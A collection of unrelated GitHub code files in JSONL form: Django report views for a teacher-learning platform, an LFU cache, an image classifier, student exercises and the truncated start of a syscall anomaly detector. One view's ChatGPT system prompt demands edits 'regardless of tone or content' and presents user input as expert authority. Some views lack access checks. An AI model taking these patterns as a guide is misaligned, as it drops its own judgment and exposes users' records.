patches[1].set_zorder(0)\n patches[1].set_edgecolor('#FFD600')\n plt.title(track_title.title(), fontsize=12, loc='center')\n plt.text(0, 0, f\"{data[0]}%\", ha='center', va='center', fontsize=20)\n # plt.text(0, 0, track_title, ha='center', va='top', fontsize=12)\n \n # save donut to image temporarily\n tmpfile = BytesIO()\n fig.savefig(tmpfile, format='png', transparent=True, bbox_inches='tight')\n encoded = base64.b64encode(tmpfile.getvalue()).decode('utf-8')\n\n html = ''.format(encoded)\n plt.close(fig)\n\n return html\n\ndef get_user_topics(curr_user):\n\n def pre_process(text):\n # lowercase\n text=text.lower()\n #remove tags\n text=re.sub(\"\",\" <> \",text)\n # remove special characters and digits\n text=re.sub(\"(\\\\d|\\\\W)+\",\" \",text)\n return text\n\n all_answers = [pre_process(x) for x in list(AnswerToVideoQuestion.objects.filter(user=curr_user).values_list('answer', flat=True)) if len(x.split()) > 1]\n if (len(all_answers) == 0): return None, None\n cv=CountVectorizer(max_df=0.85,stop_words=\"english\")\n word_count_vector=cv.fit_transform(all_answers)\n tfidf_transformer=TfidfTransformer(smooth_idf=True,use_idf=True)\n tfidf_transformer.fit(word_count_vector)\n # print(list(cv.vocabulary_.keys())[:10])\n\n def sort_coo(coo_matrix):\n tuples = zip(coo_matrix.col, coo_matrix.data)\n return sorted(tuples, key=lambda x: (x[1], x[0]), reverse=True)\n\n def extract_topn_from_vector(feature_names, sorted_items, topn=10):\n \"\"\"get the feature names and tf-idf score of top n items\"\"\"\n #use only topn items from vector\n sorted_items = sorted_items[:topn]\n score_vals = []\n feature_vals = []\n for idx, score in sorted_items:\n fname = feature_names[idx]\n #keep track of feature name and its corresponding score\n score_vals.append(round(score, 3))\n feature_vals.append(feature_names[idx])\n\n #create a tuples of feature,score\n #results = zip(feature_vals,score_vals)\n results= {}\n for idx in range(len(feature_vals)):\n results[feature_vals[idx]]=score_vals[idx]\n \n return results\n \n # you only needs to do this once\n feature_names=cv.get_feature_names_out()\n tf_idf_vector=tfidf_transformer.transform(cv.transform(all_answers))\n\n results=[]\n for i in range(tf_idf_vector.shape[0]):\n # get vector for a single document\n curr_vector=tf_idf_vector[i]\n #sort the tf-idf vector by descending order of scores\n sorted_items=sort_coo(curr_vector.tocoo())\n #extract only the top n; n here is 10\n keywords=extract_topn_from_vector(feature_names,sorted_items,10)\n results.append(keywords)\n\n df=pd.DataFrame(zip(all_answers,results),columns=['doc','keywords'])\n\n # combine all keyword weight dicts in df into one dict\n all_keywords = {}\n for i in range(len(df)):\n for key in df['keywords'][i]:\n if key in all_keywords: all_keywords[key] += df['keywords'][i][key]\n else: all_keywords[key] = df['keywords'][i][key]\n \n # sort the dict by value and return top 10\n selected_keywords = dict(sorted(all_keywords.items(), key=lambda item: item[1], reverse=True)[:10])\n\n # convert df keywords column to joint string\n df['keywords'] = df['keywords'].apply(lambda x: \", \".join(list(x.keys())))\n\n return \", \".join(list(selected_keywords.keys())), df.values.tolist()\n\ndef user_report(request, user_id=0):\n if (user_id):\n curr_user = User.objects.get(pk=user_id)\n else:\n curr_user = request.user\n\n # if post request, update the feedback objects userfeedback\n if request.method == 'POST':\n # get the feedback object\n curr_feedback = Feedback.objects.filter(user=curr_user).latest('id')\n if (curr_feedback.user_feedback): curr_feedback.user_feedback += \"\\n\\n\" + request.POST.get('userfeedback')\n else: curr_feedback.user_feedback = request.POST.get('userfeedback')\n curr_feedback.save()\n messages.info(request, \"Thank you for the comment on the AI-generated feedback! We will use this to improve our system.\")\n\n curr_learner_model = LearnerModel.objects.get(user=curr_user)\n curr_feedback = Feedback.objects.filter(user=curr_learner_model.user).latest('id').feedback if Feedback.objects.filter(user=curr_learner_model.user).exists() else None\n keywords, topics_by_answer = get_user_topics(curr_user)\n context = {\n 'learner_model': curr_learner_model,\n 'metrics': {\n m: core.defined_metrics[m].to_view(int(getattr(curr_learner_model, m + \"_score\")))\n for m in core.defined_metrics\n },\n 'description': curr_feedback,\n 'feedback_obj': Feedback.objects.filter(user=curr_learner_model.user).latest('id'),\n \"all_users\": User.objects.filter(learnermodel__school=curr_user.learnermodel.school),\n \"teaching_plot\": produce_plot('teaching', curr_user),\n \"leadership_plot\": produce_plot('leadership', curr_user),\n \"multimedia_plot\": produce_plot('multimedia', curr_user),\n \"coaching_plot\": produce_plot('coaching', curr_user),\n \"digital_plot\": produce_plot('digital', curr_user),\n \"keywords\": keywords,\n \"topics_by_answer\": topics_by_answer,\n }\n return render(request, \"report.html\", context)\n\ndef expert_report(request, user_id):\n # TODO: figure out what best to show the expert user to make decisions\n # TODO: maybe we can use AI to generate the summary of feedback first, and have human look over\n # TODO: maybe we can use AI to select the best answers that show growth in specific competencies -> highlight that for experts\n\n # Get the user in question\n if (user_id == 0):\n curr_user = User.objects.first()\n else:\n curr_user = User.objects.get(pk=user_id)\n\n curr_learner_model = LearnerModel.objects.get(user=curr_user)\n completed_modules = ModuleCompletion.objects.filter(user=curr_user).all()\n keywords, topics_by_answer = get_user_topics(curr_user)\n context = {\n \"learner_model\": curr_learner_model,\n \"curr_user\": curr_user,\n \"all_users\": User.objects.filter(learnermodel__school=curr_user.learnermodel.school),\n \"completed_modules\": completed_modules,\n 'metrics': {\n m: core.defined_metrics[m].to_view(int(getattr(curr_learner_model, m + \"_score\")))\n for m in core.defined_metrics\n },\n 'feedback_obj': Feedback.objects.filter(user=curr_learner_model.user).latest('id'),\n \"teaching_plot\": produce_plot('teaching', curr_user),\n \"leadership_plot\": produce_plot('leadership', curr_user),\n \"multimedia_plot\": produce_plot('multimedia', curr_user),\n \"coaching_plot\": produce_plot('coaching', curr_user),\n \"digital_plot\": produce_plot('digital', curr_user),\n \"keywords\": keywords,\n \"topics_by_answer\": topics_by_answer,\n }\n return render(request, \"report_expert.html\", context)\n\ndef school_report(request):\n\n curr_user = request.user\n data = User.objects.filter(learnermodel__school=curr_user.learnermodel.school)\n\n def save_plot(fig):\n # save plot to image temporarily\n tmpfile = BytesIO()\n fig.savefig(tmpfile, format='png', transparent=True, bbox_inches='tight')\n encoded = base64.b64encode(tmpfile.getvalue()).decode('utf-8')\n\n html = ''.format(encoded)\n plt.close(fig)\n\n return html\n\n def get_user_aggregate_plot(data):\n\n # for each user, get percentage of completion and format into df\n data_list = []\n for user in data:\n teaching = get_user_percentage_completion(user, 'teaching')\n leadership = get_user_percentage_completion(user, 'leadership')\n multimedia = get_user_percentage_completion(user, 'multimedia')\n coaching = get_user_percentage_completion(user, 'coaching')\n digital = get_user_percentage_completion(user, 'digital')\n data_list.append({'user': user.username, 'teaching': teaching if teaching else 0, 'leadership': leadership if leadership else 0, 'multimedia': multimedia if multimedia else 0, 'coaching': coaching if coaching else 0, 'digital': digital if digital else 0 })\n df = pd.DataFrame.from_records(data_list)\n # plot = df.plot.barh(stacked=True, title=\"Percentage of Videos Completed by User\", ylabel=\"user\", y='user')\n # fig = plot.get_figure()\n\n # sort df by cumulative percentages\n df['cumulative'] = df['teaching'] + df['leadership'] + df['multimedia'] + df['coaching'] + df['digital']\n df = df.sort_values(by=['cumulative'], ascending=False)\n df = df.drop(columns=['cumulative'])\n\n columns = list(df.columns)\n b = []\n colors = plt.cm.get_cmap('plasma',len(columns))\n xticks = [i for i in range(len(df))]\n\n fig, ax = plt.subplots(figsize=(16, 9))\n for i in range(1,len(columns)):\n if i==1:\n bar_bottom = 0\n else:\n bar_bottom = bar_bottom + df[columns[i-1]].values\n b.append(plt.bar(xticks,\n df[columns[i]].values,\n bottom = bar_bottom,\n color = colors(i)))\n for i in range(len(b)):\n ax.bar_label(b[i],\n padding = 0,\n label_type = 'center',\n rotation = 'horizontal',) # color='grey'\n ax.set_ylabel('Completion Percentages')\n ax.set_xticks(xticks)\n ax.set_xticklabels(df['user'].values, rotation = 90)\n ax.set_title('Percentage of Videos Completed by User')\n ax.legend(b, columns[1:])\n ax.spines['top'].set_visible(False)\n ax.spines['right'].set_visible(False)\n ax.spines['bottom'].set_visible(False)\n ax.spines['left'].set_visible(False)\n\n # threshold = 0\n # for c in ax.containers:\n # # Filter the labels\n # labels = [v if v > threshold else \"\" for v in c.datavalues] \n # ax.bar_label(c, labels=labels, label_type=\"center\",rotation = 'horizontal',color='grey')\n\n # save plot to image temporarily\n return save_plot(fig)\n \n def get_user_topics_agg(data):\n\n # for each user, get percentage of completion and format into df\n agg_topics = {}\n for user in data:\n topics,_ = get_user_topics(user)\n if (topics):\n for topic in topics.split(', '):\n if topic in agg_topics:\n agg_topics[topic] += 1\n else:\n agg_topics[topic] = 1\n # sort agg_topics by value\n agg_topics = dict(sorted(agg_topics.items(), key=lambda item: item[1], reverse=True))\n\n fig, ax = plt.subplots(figsize=(16, 9))\n # get list of agg_topics keys\n topics = list(agg_topics.keys())\n # get list of agg_topics values\n values = list(agg_topics.values())\n ax.bar(topics,values, color=\"#6a00a8\")\n ax.spines['top'].set_visible(False)\n ax.spines['right'].set_visible(False)\n ax.spines['bottom'].set_visible(False)\n ax.spines['left'].set_visible(False)\n ax.set_xticklabels(topics, rotation = 90)\n ax.set_title('Most Common Topics')\n \n # save plot to image temporarily\n return save_plot(fig)\n\n def get_modules_most_watched(data):\n # get all modules completed by users in data\n modules = ModuleCompletion.objects.filter(user__in=data)\n\n # for each module, add the count the video's track title in video_count\n video_count = {}\n for module in modules:\n if (not module.module.video.series): continue\n if module.module.video.series.track.title in video_count:\n video_count[module.module.video.series.track.title] += 1\n else:\n video_count[module.module.video.series.track.title] = 1\n \n # sort video_count by value\n video_count = dict(sorted(video_count.items(), key=lambda item: item[1], reverse=True))\n\n # plot the video_count dict into a pie chart\n fig, ax = plt.subplots(figsize=(16, 9))\n # convert 'plasma' colormap to list of colors\n colors = plt.cm.get_cmap('plasma',5)\n colors = [colors(i) for i in range(5)]\n ax.pie(video_count.values(), labels=video_count.keys(), autopct='%1.1f%%', startangle=90, colors=colors)\n ax.set_title('Percentages of Modules Completed by Track')\n\n return save_plot(fig)\n \n def get_agg_competency_scores(data):\n # get all learner models in data\n learner_models = LearnerModel.objects.filter(user__in=data)\n\n # get average scores of all learner models in dictionary\n avg_scores = {\n 'Planner Score': learner_models.aggregate(Avg('planner_score'))['planner_score__avg'],\n 'Guardian Score': learner_models.aggregate(Avg('guardian_score'))['guardian_score__avg'],\n 'Mentor Score': learner_models.aggregate(Avg('mentor_score'))['mentor_score__avg'],\n 'Motivator Score': learner_models.aggregate(Avg('motivator_score'))['motivator_score__avg'],\n 'Assessor Score': learner_models.aggregate(Avg('assessor_score'))['assessor_score__avg'],\n }\n\n # plot the avg_scores dict into a bar chart\n fig, ax = plt.subplots(figsize=(16, 9))\n ax.bar(avg_scores.keys(), avg_scores.values(), color=\"#6a00a8\")\n ax.set_title('Average Competency Scores')\n ax.set_ylabel('Score')\n ax.spines['top'].set_visible(False)\n ax.spines['right'].set_visible(False)\n ax.spines['bottom'].set_visible(False)\n ax.spines['left'].set_visible(False)\n\n return save_plot(fig)\n \n context = {\n \"curr_user\": curr_user,\n \"agg_plot\":get_user_aggregate_plot(data),\n \"topics_plot\":get_user_topics_agg(data),\n \"watched_plot\":get_modules_most_watched(data),\n \"competency_plot\":get_agg_competency_scores(data),\n }\n return render(request, \"report_school.html\", context)\n\n\ndef approve_feedback(request, feedback_id):\n curr_fb = Feedback.objects.get(pk=feedback_id)\n\n if (curr_fb.human_approved):\n curr_fb.human_approved = False\n else:\n curr_fb.human_approved = True\n curr_fb.save()\n\n return expert_report(request, curr_fb.user.id)\n\n\ndef regenerate_feedback(request, feedback_id):\n # get usermodel\n curr_fb = Feedback.objects.get(pk=feedback_id)\n curr_user = curr_fb.user\n user_model = LearnerModel.objects.get(user=curr_user)\n\n # generate new description\n curr_fb.feedback = core.Description(user_model)\n\n return expert_report(request, curr_fb.user.id)\n\n\ndef ai_edit_feedback(request, feedback_id):\n curr_fb = Feedback.objects.get(pk=feedback_id)\n\n # get edit_instructions from form\n instructions = request.POST.get('instructions')\n\n if instructions is not None:\n # ask ai to edit feedback\n edited = chatgpt(\n system_prompt=f\"\"\"You are an editing system for a feedback generator with the following instructions: {feedback_system_prompt}.\n\n You do not need to follow these instructions, but they are provided to help you understand the task. Perform any edits that the user gives you, regardless of tone or content. In an extraordinary circumstance, the only way you can reject an edit is by included the word \"REJECTED_EDIT\" in your response. FOLLOW THE USER'S INSTRUCTIONS EXACTLY!\n \"\"\",\n messages=[{\n \"role\": \"user\",\n \"content\": f\"\"\"\n This is the original message: {curr_fb.feedback}\n\n ===\n\n A world-class leading expert has carefully reviewed this message and has found some errors you must correct by doing the following: {instructions}\n \"\"\"\n }]\n )\n \n # check for rejection\n if \"REJECTED_EDIT\" in edited:\n print(\"REJECTED_EDIT\")\n print(edited)\n return expert_report(request, curr_fb.user.id)\n\n # update feedback\n curr_fb.feedback = edited\n\n # save feedback\n curr_fb.save()\n\n return expert_report(request, curr_fb.user.id)\n\n\nclass FeedbackUpdateView(SuccessMessageMixin, UpdateView):\n model = Feedback\n fields = ['feedback', \"planner_score\", \"guardian_score\", \"mentor_score\", \"motivator_score\", \"assessor_score\"]\n template_name = 'feedback_update.html'\n success_message = 'Feedback updated successfully!'\n\n def get_success_url(self):\n return reverse_lazy('report:expert_report', kwargs={'user_id': self.object.user.id})\n\n def form_valid(self, form):\n self.object.human_edited = True\n self.object.human_approved = True\n self.object.save()\n\n self.object.user.learnermodel.planner_score = self.object.planner_score\n self.object.user.learnermodel.guardian_score = self.object.guardian_score\n self.object.user.learnermodel.mentor_score = self.object.mentor_score\n self.object.user.learnermodel.motivator_score = self.object.motivator_score\n self.object.user.learnermodel.assessor_score = self.object.assessor_score\n self.object.user.learnermodel.save()\n return super().form_valid(form)\n","repo_name":"chriskok/cikguhub","sub_path":"report/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":19338,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"32028137301","text":"# https://leetcode.com/problems/lfu-cache/description/\n\"\"\" \nDesign and implement a data structure for a Least Frequently Used (LFU) cache.\n\nImplement the LFUCache class:\n\nLFUCache(int capacity) Initializes the object with the capacity of the data structure.\nint get(int key) Gets the value of the key if the key exists in the cache. Otherwise, returns -1.\nvoid put(int key, int value) Update the value of the key if present, or inserts the key if not already present. When the cache reaches its capacity, it should invalidate and remove the least frequently used key before inserting a new item. For this problem, when there is a tie (i.e., two or more keys with the same frequency), the least recently used key would be invalidated.\nTo determine the least frequently used key, a use counter is maintained for each key in the cache. The key with the smallest use counter is the least frequently used key.\n\nWhen a key is first inserted into the cache, its use counter is set to 1 (due to the put operation). The use counter for a key in the cache is incremented either a get or put operation is called on it.\n\nThe functions get and put must each run in O(1) average time complexity.\n\n \n\nExample 1:\n\nInput\n[\"LFUCache\", \"put\", \"put\", \"get\", \"put\", \"get\", \"get\", \"put\", \"get\", \"get\", \"get\"]\n[[2], [1, 1], [2, 2], [1], [3, 3], [2], [3], [4, 4], [1], [3], [4]]\nOutput\n[null, null, null, 1, null, -1, 3, null, -1, 3, 4]\n\nExplanation\n// cnt(x) = the use counter for key x\n// cache=[] will show the last used order for tiebreakers (leftmost element is most recent)\nLFUCache lfu = new LFUCache(2);\nlfu.put(1, 1); // cache=[1,_], cnt(1)=1\nlfu.put(2, 2); // cache=[2,1], cnt(2)=1, cnt(1)=1\nlfu.get(1); // return 1\n // cache=[1,2], cnt(2)=1, cnt(1)=2\nlfu.put(3, 3); // 2 is the LFU key because cnt(2)=1 is the smallest, invalidate 2.\n // cache=[3,1], cnt(3)=1, cnt(1)=2\nlfu.get(2); // return -1 (not found)\nlfu.get(3); // return 3\n // cache=[3,1], cnt(3)=2, cnt(1)=2\nlfu.put(4, 4); // Both 1 and 3 have the same cnt, but 1 is LRU, invalidate 1.\n // cache=[4,3], cnt(4)=1, cnt(3)=2\nlfu.get(1); // return -1 (not found)\nlfu.get(3); // return 3\n // cache=[3,4], cnt(4)=1, cnt(3)=3\nlfu.get(4); // return 4\n // cache=[4,3], cnt(4)=2, cnt(3)=3\n\"\"\"\nfrom collections import defaultdict\n\n\nclass Node:\n def __init__(self, key=0, val=0):\n self.prev = None\n self.next = None\n self.key = key\n self.val = val\n self.freq = 1\n\n\nclass DDL:\n def __init__(self):\n self.head = Node()\n self.tail = Node()\n\n self.head.next = self.tail\n self.tail.prev = self.head\n\n self.size = 0\n\n def __len__(self):\n return self.size\n\n def insert(self, node):\n node.next = self.head.next\n node.prev = self.head\n\n self.head.next.prev = node\n self.head.next = node\n self.size += 1\n\n def delete(self, node=None):\n if not node:\n # As it will be the first inserted node\n node = self.tail.prev\n\n if node == self.head:\n return\n\n # print('\\n',node.key,node.val)\n\n # Delete the node\n node.prev.next = node.next\n node.next.prev = node.prev\n\n node.next = None\n node.prev = None\n self.size -= 1\n return node.key\n\n def dis(self):\n temp = self.head.next\n while temp:\n print('v:', temp.val, 'k:', temp.key, 'f:', temp.freq, end=' ')\n temp = temp.next\n\n\nclass LFUCache:\n\n def __init__(self, capacity: int):\n self.capacity = capacity\n self.hashMap = dict()\n self.freqList = defaultdict(DDL)\n self.minFreq = 0\n\n def get(self, key: int) -> int:\n # print('\\n get start')\n if key not in self.hashMap:\n return -1\n\n # After getting the key update its frequency\n node = self.hashMap[key]\n val = node.val\n freq = node.freq\n\n self.freqList[freq].delete(node)\n\n newNode = Node(key, val)\n newNode.freq = freq+1\n\n if self.minFreq == freq and len(self.freqList[freq]) == 0:\n self.minFreq += 1\n\n self.freqList[freq+1].insert(newNode)\n self.hashMap[key] = newNode\n\n # print('minFreq',self.minFreq)\n # print('\\n GET',key)\n # print('len:',freq,len(self.freqList[freq]))\n # self.freqList[freq].dis()\n # print('\\n len:',freq+1,len(self.freqList[freq+1]))\n # self.freqList[freq+1].dis()\n\n return val\n\n def put(self, key: int, value: int) -> None:\n # print('\\n put start')\n\n # If key already in hashMap update it\n # print('puminFreq',self.minFreq)\n if key in self.hashMap:\n # print('in')\n node = self.hashMap[key]\n freq = node.freq\n\n self.freqList[freq].delete(node)\n\n newNode = Node(key, value)\n newNode.freq = freq+1\n\n if self.minFreq == freq and len(self.freqList[freq]) == 0:\n self.minFreq += 1\n\n self.freqList[freq+1].insert(newNode)\n self.hashMap[key] = newNode\n\n else:\n if self.capacity == len(self.hashMap):\n # Remove the LFU\n dkey = self.freqList[self.minFreq].delete()\n\n del self.hashMap[dkey]\n\n newNode = Node(key, value)\n\n self.hashMap[key] = newNode\n\n self.freqList[1].insert(newNode)\n\n self.minFreq = 1\n\n # print('\\n PUT',key,value)\n # self.freqList[1].dis()\n\n\n# Your LFUCache object will be instantiated and called as such:\n# obj = LFUCache(capacity)\n# param_1 = obj.get(key)\n# obj.put(key,value)\n","repo_name":"atharvaagrawal/dsa","sub_path":"Striver-A2Z/09_Stack_and_Queues/4_Implementation_Problem/2_LFU.py","file_name":"2_LFU.py","file_ext":"py","file_size_in_byte":5783,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"69833396712","text":"from features import compute_hog_features\nfrom utils import load_data, transform_to_classification_dataset, report_metrics\nimport numpy as np\nfrom sklearn.preprocessing import StandardScaler\nfrom sklearn.svm import LinearSVC\nimport cv2\n\n\nif __name__=='__main__':\n np.random.seed(42)\n recompute_vocabulary = False\n\n clf = LinearSVC(C=0.0005, class_weight=\"balanced\")\n\n train_images, test_images, train_logos, test_logos = load_data('./data', test_size=0.33)\n train_images_clf, y_train = transform_to_classification_dataset(train_images, train_logos)\n test_images_clf, y_test = transform_to_classification_dataset(test_images, test_logos)\n \n print(\"Training stage...\")\n X_train = compute_hog_features(train_images_clf)\n scaler = StandardScaler().fit(X_train)\n X_train = scaler.transform(X_train)\n clf.fit(X_train, y_train)\n y_pred = clf.predict(X_train)\n report_metrics(y_train, y_pred, \"Train\")\n\n print(\"Evaluation stage...\")\n X_test = compute_hog_features(test_images_clf)\n X_test = scaler.transform(X_test)\n y_pred = clf.predict(X_test)\n report_metrics(y_test, y_pred, \"Test\")\n\n s_test = np.ones(len(y_test), np.uint)\n nologo_idx = np.where(y_test == 10)\n s_test[nologo_idx] = 0\n \n s_pred = np.ones(len(y_pred), np.uint)\n nologo_idx = np.where(y_pred == 10)\n s_pred[nologo_idx] = 0\n report_metrics(s_test, s_pred, \"Logo/No-Logo results on testset\")\n\n \n \n\n","repo_name":"stkovacevic94/opencv-traffic-sign-detector","sub_path":"src/hog_classification.py","file_name":"hog_classification.py","file_ext":"py","file_size_in_byte":1443,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"41324696412","text":"# https://judge.softuni.org/Contests/Practice/Index/2302#2\n\n\ndef plunder(targets, town, n_people, gold_q):\n # If any of those two values (population or gold) reaches zero,\n # the town is disbanded.\n if targets[town][0] <= n_people:\n killed = targets[town][0]\n stolen_gold = gold_q\n if targets[town][1] <= gold_q:\n stolen_gold = targets[town][1]\n\n print(f\"{town} plundered! {stolen_gold} gold stolen, {killed} citizens killed.\")\n print(f\"{town} has been wiped off the map!\")\n targets.pop(town)\n return targets\n\n elif targets[town][1] <= gold_q:\n stolen_gold = targets[town][1]\n killed = n_people\n if targets[town][0] <= n_people:\n killed = targets[town][0]\n\n print(f\"{town} plundered! {stolen_gold} gold stolen, {killed} citizens killed.\")\n print(f\"{town} has been wiped off the map!\")\n targets.pop(town)\n return targets\n\n else:\n killed = n_people\n stolen_gold = gold_q\n targets[town][0] = targets[town][0] - n_people\n targets[town][1] = targets[town][1] - gold_q\n print(f\"{town} plundered! {stolen_gold} gold stolen, {killed} citizens killed.\")\n\n return targets\n\n\ndef prosper(targets, town, gold_q):\n targets[town][1] += gold_q\n print(f\"{gold_q} gold added to the city treasury. {town} now has {targets[town][1]} gold.\")\n return targets\n\n\ntargets = {} # {city: [population, gold]}\ncities_input = input().split('||')\n\nwhile cities_input[0] != 'Sail':\n\n city = cities_input[0]\n population = int(cities_input[1])\n gold = int(cities_input[2])\n if city not in targets:\n targets[city] = [population, gold]\n else:\n targets[city][0] += population\n targets[city][1] += gold\n cities_input = input().split('||')\n\nevents = input().split('=>') # Plunder {town: [n_people, gold_q]}\n # Prosper {town: gold_q}\nwhile events[0] != 'End':\n town = events[1]\n if events[0] == 'Plunder':\n n_people = int(events[2])\n gold_q = int(events[3])\n targets = plunder(targets, town, n_people, gold_q)\n elif events[0] == 'Prosper':\n gold_q = int(events[2])\n if gold_q > 0:\n targets = prosper(targets, town, gold_q)\n else:\n print(\"Gold added cannot be a negative number!\")\n events = input().split('=>')\n\ncounter = len(targets)\n\nif targets:\n print(f\"Ahoy, Captain! There are {counter} wealthy settlements to go to:\")\n for location in targets:\n print(f\"{location} -> Population: {targets[location][0]} citizens, Gold: {targets[location][1]} kg\")\n\nelse:\n print(\"Ahoy, Captain! All targets have been plundered and destroyed!\")\n","repo_name":"h-dmt/Python_Fundamentals","sub_path":"exam_sym/pirates.py","file_name":"pirates.py","file_ext":"py","file_size_in_byte":2735,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"21081071919","text":"import logging\nimport os\nos.environ['TF_CPP_MIN_LOG_LEVEL'] = '3'\nlogging.getLogger('tensorflow').disabled = True\n\nfrom tradebot.environments.trade_environment import TradeEnvironment\nimport pandas as pd\nfrom datetime import datetime\nfrom stable_baselines.common.policies import MlpLstmPolicy\nfrom stable_baselines import PPO2\nfrom stable_baselines.common.vec_env import DummyVecEnv\n\n\ndef test_trade_environment():\n # Drop csv file in tests/data\n data = pd.read_csv(os.path.join(\n os.path.dirname(os.path.abspath(__file__)), '../data/btcusd.csv'))\n\n # print(data)\n data = data.drop(['time'], axis=1)\n n = len(data)\n split_point = int(n*.8)\n train = data.iloc[:split_point]\n test = data.iloc[split_point:]\n\n train_env = TradeEnvironment(train, transaction_fee=0.0026, episode_length=1000)\n train_env = DummyVecEnv([lambda: train_env])\n model = PPO2(MlpLstmPolicy, train_env, nminibatches=1)\n model.learn(total_timesteps=10000)\n\n test_env = TradeEnvironment(test, transaction_fee=0.0026, episode_length=1000)\n test_env = DummyVecEnv([lambda: test_env])\n obs = test_env.reset()\n done = False\n cum_rewards = 0\n while not done:\n action, _states = model.predict(obs)\n obs, reward, done, info = test_env.step(action)\n print(obs, reward)\n cum_rewards += reward\n test_env.render()\n print(cum_rewards)\n\nif __name__ == '__main__':\n test_trade_environment()","repo_name":"aquintero/CMBot","sub_path":"tradebot/tests/manual/test_trade_environment.py","file_name":"test_trade_environment.py","file_ext":"py","file_size_in_byte":1447,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"13036043275","text":"#\n# Lab04Ejercicio1.py\n#\n# DESCRIPCION: Programa que lee los coeficientes de hasta que se introduzca el\n# valor cero, y los alamacena en un arreglo. Muestra el grado del polinomio y \n# luego escribe el polinomio en notación polinomial. El grado del polinomio no\n# puede ser mayor que un valor M dado inicialmente por el usuario. \n#\n# Autor: \n#\tManuel Faria\n\n# Variables:\n# M: int \t // ENTRADA: Grado máximo del polinomio.\n# A: array[0,M+1) // ENTRADA: Arreglo que contiene los coeficientes.\n\n# Valores Iniciales:\nM = int(input(\"Ingrese el grado máximo del polinomio: \"))\nA = [0]*(M+1)\n\n# Precondición:\nassert(M>=0)\n\n# Calculos:\n# Invariante y cota:\n# Cota: N - i\nassert(True)\n\nfor i in range(0,M+1):\n\tA[i]=int(input(\"Ingrese el valor del coeficiente C\" + str(i) + \": \"))\n\n\t# Invariante:\n\tassert(True)\n\nprint(\"Grado del polinomio:\" + str(M))\nprint(\"P(x)=\", end='')\n\n# Invariante y cota:\n# Cota: N - i\nassert(True)\n\nfor j in range(0,M+1):\n\tif A[j]!=0:\n\t\tprint(str(A[j]) + \"x^\" + str(j), end='')\n\t\tif j!=M and A[i]!=0:\n\t\t\tprint(\"+\", end='')\n\n\t# Invariante:\n\tassert(True)\n\nprint(\"\")\n\n# Postcondición:\nassert(True)\n","repo_name":"mfaria724/CI2691-lab-algoritmos-1","sub_path":"Laboratorio 04/Laboratorio/Lab04Ejercicio1.py","file_name":"Lab04Ejercicio1.py","file_ext":"py","file_size_in_byte":1121,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"25276974357","text":"import urllib.request\nfrom rembg import remove\nfrom PIL import Image\n\nimport logging\nlogging.basicConfig(level = logging.INFO)\n\nPICUTRE_PATH_SRC = \"./dist/tmp.jpg\"\nPICTURE_PATH_DST = \"./dist/tmp-no-bg.jpg\"\nPICTURE_PATH_DST_WITH_TICKET = \"./dist/tmp-no-bg-ticket.jpg\"\n\nTICKET_ASSET_PATH = \"./assets/ticket.jpg\"\n\ndef download_picture(url):\n logging.info(f\"Downloading picture from {url}\")\n urllib.request.urlretrieve(url, PICUTRE_PATH_SRC)\n\n\ndef superpose_ticket_image():\n logging.info(\"Adding ticket image to picture\")\n bg = Image.open(PICTURE_PATH_DST).convert('RGBA')\n foreground = Image.open(TICKET_ASSET_PATH).convert('RGBA')\n\n foreground.thumbnail((300,300), Image.Resampling.LANCZOS)\n bg.paste(foreground, ( int(bg.width / 2 - 100), int(bg.height / 2 - 100) ), foreground)\n \n \n bg = bg.convert('RGB')\n bg.save(PICTURE_PATH_DST_WITH_TICKET)\n return bg\n\n\ndef proccess_image():\n logging.info(f\"Removing background\")\n with open(PICUTRE_PATH_SRC, 'rb') as i:\n with open(PICTURE_PATH_DST, 'wb') as o:\n t = i.read()\n output = remove(t)\n o.write(output)\n logging.info(\"Background removed\")\n \n superpose_ticket_image()\n ","repo_name":"sylvainSUPINTERNET/product-generator-lotby","sub_path":"service.py","file_name":"service.py","file_ext":"py","file_size_in_byte":1210,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"6711021981","text":"from itertools import islice\nfrom syscalls import syscalls\nfrom sklearn.naive_bayes import GaussianNB\nfrom sklearn.neighbors import KNeighborsClassifier\nfrom sklearn.ensemble import RandomForestClassifier\n# from sklearn.svm import LinearSVC\n# from sklearn.svm import SVC\nfrom sklearn.neural_network import MLPClassifier\nfrom sklearn.svm import OneClassSVM\nfrom sklearn.ensemble import IsolationForest\nfrom sklearn.ensemble import AdaBoostClassifier\n\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.metrics import f1_score\nfrom sklearn.metrics import recall_score\nfrom sklearn.metrics import precision_score\nfrom sklearn.metrics import accuracy_score\n\nimport numpy as np\n\nimport argparse\nimport os\n\nWINDOW_SIZE = 0\nN_NEIGHBORS = 3\n\nLABEL_MULT_NORMAL = 0\nLABEL_MULT_ANORMAL = 1\n\nLABEL_ONE_NORMAL = 1\nLABEL_ONE_ANORMAL = -1\n\nRUNS = 10\n\nFILES_PATH = os.path.join(os.path.dirname(os.path.realpath(__file__)), \"wordpress\", \"{v}\", \"{b}\")\n\n\ndef sliding_window_filter(input_file):\n it = iter(input_file)\n result = ()\n for elem in it:\n if (elem.startswith(\"---\")):\n elem = elem.split(\" \")[1]\n if (\"threat\" in syscalls[elem.split(\"(\")[0]]):\n if (syscalls[elem.split(\"(\")[0]][\"threat\"] != 4):\n result = result + (syscalls[elem.split(\"(\")[0]][\"id\"],)\n else:\n raise Exception(f\"Threat para {elem.split('(')[0]} não encontrada\")\n if len(result) == WINDOW_SIZE:\n yield result\n break\n for elem in it:\n if (elem.startswith(\"---\")):\n elem = elem.split(\" \")[1]\n if (\"threat\" in syscalls[elem.split(\"(\")[0]]):\n if (syscalls[elem.split(\"(\")[0]][\"threat\"] != 4):\n result = result[1:] + (syscalls[elem.split(\"(\")[0]][\"id\"],)\n yield result\n else:\n raise Exception(f\"Threat para {elem.split('(')[0]} não 